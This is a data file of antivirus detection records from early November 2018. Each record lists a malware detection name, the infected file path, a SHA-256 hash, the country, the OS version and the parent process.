  Row(detection=Row(filename='avscan-20181104-214329-1ba1225c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-211952-770FA898\\AVSCAN-20181104-214329-1BA1225C', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3ff461b78ee8e94429f88869d61f7be58f223c7b1e5dc13ff6e093f3b88174fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T16:13:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130527-fcf4963d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-130527-FCF4963D', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:05:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150212-690ed414', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-150212-690ED414', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:02:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T20:27:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-04T05:14:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='7360.exe', filepath='\\?\\C:\\Documents and Settings\\X\\Local Settings\\Temp\\7360.exe', filesize=14276000, name='HEUR/AGEN.1014167.#M1.#R1'), hash='0402376851d7aee89bb11345fa44275ce23839aaffc66e61ca64ef81d570c807', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:04:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='castsrv.exe', filepath='C:\\$WINDOWS.~BT\\NewOS\\Windows\\WinSxS\\x86_microsoft-windows-castserver_31bf3856ad364e35_10.0.17134.1_none_510114d1e1d1b62a\\CastSrv.exe', filesize=60000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='77a7de2f5473a3d62582bcc5bae9c97a861511f671f6c7b84f365b56f36f29c7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:04:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-04T19:20:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fdpmkv.dll', filepath='\\\\?\\C:\\Program Files\\Wondershare\\MobileGo for Android\\MultimediaLibs\\DecPlugins\\fdpMKV.dll', filesize=556000, name='W32/Ramnit.C.#M1.#R1'), hash='66cdb332d0a97cd62226c84c0e692d9b3da1ab2299491f624559a470ac1d5852', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:16:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='№19 свод высшая-табл (1) дина.exe', filepath='f:\\файлы скрыты трояном\\аттестау\\№19 СВОД ВЫСШАЯ-табл (1) Дина.exe', filesize=1728000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='4150dccc9aaa8ad6ad0b6c1652815708e3608ed762c5baf8c0dca4b2c42d90f3', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:31:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:24:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001f49e', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001f49e', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:22:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='46f61eb54ea7326b7db3284fe7d1aaab2e24e1fd', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\46f61eb54ea7326b7db3284fe7d1aaab2e24e1fd', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='5ac72960087d17119108c7221cdcbeb368a721c65c816981229d2f891d83936d', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:15:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0342837.exe', filepath='J:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP434\\A0342837.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='8a1b7fc5b143627da76b9a675ea56cf91e8d6c0a79c32b4035197e2ed0497987', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T09:38:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='jetupdate.exe', filepath='C:\\Program Files\\JetAudio\\jetUpdate.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='90864d19d2b2cf26f03973e34c494eafe5889ec522117388f064ec8614bf3c3f', metadata=Row(cmdline='\\\\\\/flags:0x0', country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\LogonUI.exe', parentsize=10752, timestamp='2018-11-04T02:06:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ultra xvid codeck pack.exe', filepath='C:\\Users\\X\\Documents\\Vuze Downloads\\movie_65923_1080p_MPEG2\\Ultra XVid Codeck Pack.exe', filesize=512000, name='TR/Kryptik.vxbnq.#M1.#R1'), hash='6aebe3252c7ac6a5ebaf908c8e0ffeaa0b0e72759f8b7bedb1f90a4c1b4c1375', metadata=Row(cmdline='\\\\\\/systemstart \\\\\\/autostart \\\\\\/adminuser', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\IObit Malware Fighter\\IMF.exe', parentsize=5608208, timestamp='2018-11-04T19:15:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (5).exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate (5).exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='52f99fcbf44511b44e259588d108dd195cbdcc3e629cca0140a65a22aa14bd85', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-04T16:38:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132432-537f3af0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132432-537F3AF0', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:24:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered sirif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered sirif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='6d0956becde79707bc2822ca4e6de56fc8b1228145d7ba62c2dfaea6064628ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:31:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-13-14-05.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-11-03T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T17:06:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140239-f08d3e3d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140239-F08D3E3D', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-125955-7871f9bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4223386e\\AVSCAN-20181104-125825-6DFA0387\\AVSCAN-20181104-125955-7871F9BF', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T05:59:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T13:59:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dealplylive.exe.vir', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\C\\Program Files (x86)\\DealPlyLive\\Update\\DealPlyLive.exe.vir', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T10:40:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-123435-1d06a52c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b8b3d596\\AVSCAN-20181104-122936-F2F99660\\AVSCAN-20181104-123435-1D06A52C', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:34:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204500-19cec273', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_336ab275\\AVSCAN-20181104-204225-0179012A\\AVSCAN-20181104-204500-19CEC273', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:45:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-183323-e1595f18', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5b42b35b\\AVSCAN-20181104-181543-4D9C6CC9\\AVSCAN-20181104-183323-E1595F18', filesize=896000, name='ADWARE/CrossRider.Gen2.#M1.#R1'), hash='67d56162c250a09bdb11a194c8afe4787622d5f4e61878015b88747ac29855f5', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:33:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='opencv_haartraining.exe', filepath='\\\\?\\E:\\Programs\\Developer Pro\\OpenCV\\opencv\\build\\x64\\vc11\\bin\\opencv_haartraining.exe', filesize=256000, name='W32/Neshta.A.#M1.#R1'), hash='4995d3ea19a3182b0a8eb26e6ad01e19f3aad925c41ff6fc2d77cec4ceaa3886', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T07:21:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0003394.exe', filepath='f:\\system volume information\\_restore{c479216e-5d38-4428-b4db-e28930c85d49}\\rp8\\A0003394.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='a1bb0e68141d123cb9514828f710f76128347cd7c05925d2dbef0f476c3a9965', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:28:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsy5A45.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Download\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-04T18:02:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T01:35:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d844', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d844', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:44:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-185348-64f06509', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8006e641\\AVSCAN-20181104-185238-58A70FCE\\AVSCAN-20181104-185348-64F06509', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='0db8d2133327b4b22206fee7412826e1843df743358048be655c045258de3207', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:53:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00000045', filepath='C:\\Windows\\Temp\\tmp0000044f\\tmp00000045', filesize=2176000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='86de3d5dc1678919598aab07ecffaaeaf0e05b1b907a73d8b2d933d7fccd3095', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Emsisoft Anti-Malware\\a2service.exe', parentsize=9449800, timestamp='2018-11-04T16:44:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220959-4bd04c97', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-220959-4BD04C97', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:10:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dtsu2pausrv32.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\drp\\DP_Audio_wnt6-x86_1111\\drp\\x86\\S\\Realtek\\2\\DTSU2PAuSrv32.exe', filesize=256000, name='W32/Sality.AG.#M1.#R1'), hash='9747165e934ea35cceeff9e433b43095b25b52a5842a96643eaba52e88b70fc0', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-04T07:32:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='0.exe', filepath='G:\\العـــاب11\\Snowmobile Championship\\0.EXE', filesize=1728000, name='W32/Virut.Gen.#M1.#R1'), hash='4b25059faeb7ca2aae19fa3cb85646630ced9cdc3e5835077ae6b817a01f2a62', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-04T14:41:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Desktop\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:51:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\Autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:52:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000013f', filepath='C:\\Windows\\Temp\\tmp00000258\\tmp0000013f', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T13:58:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-172023-ae77907c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-172023-AE77907C', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5642847f2a431c9c5852b1e5ebe606f11acd628c251cc8d30f75beadc612518d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:20:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204125-807f1bc9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7c04be1a\\AVSCAN-20181104-203831-6219C626\\AVSCAN-20181104-204125-807F1BC9', filesize=832000, name='HEUR/APC.#M1.#R1'), hash='c04100433a92893732ec84902b22532a3f937c0efa604f7589c5332599a565c0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:38:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:51:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dhl shipment.exe', filepath='DHL SHIPMENT.exe', filesize=584000, name='TR/Dropper.VB.b73de8.#M1.#R1'), hash='b73de8b732af32fb43df6569998f4a9b0ee2c681356b0858dffe2f4c5f05ad9c', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nbeachbt.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\NBEACHBT\\NBEACHBT.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='reg.exe', filepath='E:\\WINDOWS\\ServicePackFiles\\i386\\reg.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='c25885025ed1fb4fece528f2b389ba3ddf327efea3752a0b41b54cc17c0b9d8a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:37:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='75efa335d6e6fa39037e5b8d36cb2330a618cc2b15ad2485f6296517b8e2d9e2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\75EFA335D6E6FA39037E5B8D36CB2330A618CC2B15AD2485F6296517B8E2D9E2', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='75efa335d6e6fa39037e5b8d36cb2330a618cc2b15ad2485f6296517b8e2d9e2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:39:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~sed7f9.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~seD7F9.tmp', filesize=832000, name='HEUR/AGEN.1025634.#M1.#R1'), hash='c9833fa6f2ad06b37fe305c27eda5ab434ed9ddca2819dca59e7c74dc284c6e1', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:15:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zhzovaqg.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\ZhZovAqG.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:02:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='voxfujsh.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\VOXFUJsh.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:31:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221442-57fe9957', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221442-57FE9957', filesize=64000, name='TR/Agent.64000.117.#M1.#R1'), hash='832eb4a864185bf214144732067e7aeb1b157e4016f2acd118fd9246385742b8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:14:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fiwllc.exe', filepath='C:\\Windows\\System32\\fiwllc.exe', filesize=576000, name='HEUR/AGEN.1024618.#M1.#R1'), hash='df51caf4f72b8e4fad3e5afa11d40330cb554b5f6d67544891976283798597e3', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T07:27:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='partitionfindandmount.exe', filepath='E:\\HBCD\\Programs\\PartitionFindAndMount.exe', filesize=64000, name='TR/Siggen.64000.1.#M1.#R1'), hash='bff6eb442a00089abb08a519e3dc447241e8a0d37685002cf8a6c6f62e9fc6a1', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:21:31Z'), dt=datetime.date(2018, 11, 2)),
